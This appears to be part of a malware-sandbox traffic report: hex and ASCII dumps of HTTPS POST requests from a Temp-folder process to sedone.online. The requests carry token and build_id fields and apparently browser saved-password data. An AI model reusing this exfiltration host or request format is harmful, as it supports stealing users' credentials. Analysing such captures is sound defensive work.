                                                                                                                                                                                                                                                  2024-12-17 16:29:28 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                  2024-12-17 16:29:28 UTC16355OUTData Raw: 41 59 69 43 78 45 41 41 51 59 42 44 51 51 49 41 77 67 49 44 51 67 49 43 41 67 4a 43 41 41 76 5a 58 64 45 74 42 69 33 43 71 41 41 41 41 59 34 6f 47 49 66 43 68 45 41 41 51 59 42 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 77 41 76 5a 58 64 45 74 42 69 33 43 59 41 41 41 41 59 66 43 52 45 41 41 51 59 42 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 67 41 76 5a 58 64 45 74 42 69 33 43 49 41 41 41 41 59 65 43 42 45 41 41 51 59 49 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 51 41 76 5a 58 64 45 74 42 69 33 45 41 41 41 42 69 49 48 45 51 41 42 42 67 45 4e 42 41 67 44 43 41 67 4e 43 41 67 49 43 41 6b 45 41 43 39 6c 5a 51 58 79 48 55 51 47 6f 41 41 41 42 67 50 73 35 42 38 47 45 51 41 42 42 67 45 4e 42 41 67 49 43 41 67 4e 43 41 67 49 43 41 6b 44
                                                                                                                                                                                                                                                  Data Ascii: AYiCxEAAQYBDQQIAwgIDQgICAgJCAAvZXdEtBi3CqAAAAY4oGIfChEAAQYBDQQICAgIDQgICAgJBwAvZXdEtBi3CYAAAAYfCREAAQYBDQQICAgIDQgICAgJBgAvZXdEtBi3CIAAAAYeCBEAAQYIDQQICAgIDQgICAgJBQAvZXdEtBi3EAAABiIHEQABBgENBAgDCAgNCAgICAkEAC9lZQXyHUQGoAAABgPs5B8GEQABBgENBAgICAgNCAgICAkD
                                                                                                                                                                                                                                                  2024-12-17 16:29:28 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                  2024-12-17 16:29:28 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                  2024-12-17 16:29:28 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                  2024-12-17 16:29:28 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                  2024-12-17 16:29:28 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                  2024-12-17 16:29:28 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                  2024-12-17 16:29:28 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                  2024-12-17 16:29:30 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Tue, 17 Dec 2024 16:29:30 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  13192.168.2.449844116.203.12.1144437808C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-12-17 16:29:29 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----KFUSRIECT2VAAAIM79H4
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                  Host: sedone.online
                                                                                                                                                                                                                                                  Content-Length: 55081
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-12-17 16:29:29 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 46 55 53 52 49 45 43 54 32 56 41 41 41 49 4d 37 39 48 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 31 30 61 31 39 61 35 30 39 39 33 64 31 39 38 32 33 35 62 61 63 65 65 35 66 36 30 34 36 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 55 53 52 49 45 43 54 32 56 41 41 41 49 4d 37 39 48 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 55 53 52 49 45 43 54 32 56 41 41 41 49 4d 37 39 48 34 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                  Data Ascii: ------KFUSRIECT2VAAAIM79H4Content-Disposition: form-data; name="token"7610a19a50993d198235bacee5f60466------KFUSRIECT2VAAAIM79H4Content-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------KFUSRIECT2VAAAIM79H4Cont
                                                                                                                                                                                                                                                  2024-12-17 16:29:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                  2024-12-17 16:29:29 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                  2024-12-17 16:29:29 UTC6016OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                  2024-12-17 16:29:31 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Tue, 17 Dec 2024 16:29:31 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-12-17 16:29:31 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  14192.168.2.449855116.203.12.1144437808C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-12-17 16:29:32 UTC328OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----IE3E3OPZUA1N7YU3OPH4
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                  Host: sedone.online
                                                                                                                                                                                                                                                  Content-Length: 142457
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-12-17 16:29:32 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 49 45 33 45 33 4f 50 5a 55 41 31 4e 37 59 55 33 4f 50 48 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 31 30 61 31 39 61 35 30 39 39 33 64 31 39 38 32 33 35 62 61 63 65 65 35 66 36 30 34 36 36 0d 0a 2d 2d 2d 2d 2d 2d 49 45 33 45 33 4f 50 5a 55 41 31 4e 37 59 55 33 4f 50 48 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 49 45 33 45 33 4f 50 5a 55 41 31 4e 37 59 55 33 4f 50 48 34 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                  Data Ascii: ------IE3E3OPZUA1N7YU3OPH4Content-Disposition: form-data; name="token"7610a19a50993d198235bacee5f60466------IE3E3OPZUA1N7YU3OPH4Content-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------IE3E3OPZUA1N7YU3OPH4Cont
                                                                                                                                                                                                                                                  2024-12-17 16:29:32 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                  2024-12-17 16:29:32 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
